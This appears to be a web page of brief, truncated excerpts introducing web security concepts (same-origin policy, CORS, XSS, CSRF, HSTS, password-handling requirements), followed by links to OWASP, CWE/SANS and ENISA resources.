An origin is defined as a combination of URI scheme, host name, and port number. Same Origin Policy prevents a web site’s scripts from accessing and interacting with scripts used on other sites. In other words, this policy prevents a malicious script on one page from obtaining access to sensitive data on another web page through that page’s Document Object Model. Cross-Origin Resource Sharing The second technique for relaxing the same-origin policy is standardized under the name Cross-Origin Resource Sharing. This standard extends HTTP with a new Origin request header and a new Access-Control-Allow-Origin response header. It allows servers to…
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Non-persistent XSS: These are usually the most common types. Typically these are within HTTP query parameters and are used by…
CSRF is an attack that tricks the victim into submitting a malicious request. It inherits the identity and privileges of the victim to perform an undesired function on the victim’s behalf. For most sites, browser requests automatically include any credentials associated with the site, such as the user’s session cookie, IP address, Windows domain credentials, and so forth. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish between the forged request sent by the victim and a legitimate request sent by the victim. Read more: OWASP – CSRF, CSRF CWE
HTTP Strict Transport Security (HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. Read more: OWASP – HSTS Cheatsheet,
Responsibilities of systems processing passwords – Passwords must be prohibited from being displayed when entered. – Passwords must never be stored in clear, readable format (encryption must always be used). – Encrypted password hashes must never be accessible to unauthorized individuals. – Where possible, salted hashes should be used for password encryption. Password requirements – At least eight (8) characters; using a combination of at least one character from each of the following four listed character types: — uppercase letters (A-Z) — lowercase letters (a-z) — base 10 digits (0-9) — non-alphanumeric (such as ` ~ ! @ # $…
CERTCOOP : http://certcoop.eu/ OWASP Top 10 Most Critical Web Application Security Risks (2017): OWASP top 10 – 2017 CWE/SANS TOP 25 Most Dangerous Software Errors: CWE/SANS TOP 25 Securing PHP web applications: https://php.earth/docs/security/intro Network forensics: Infosec – Network forensics , ENISA training for network forensics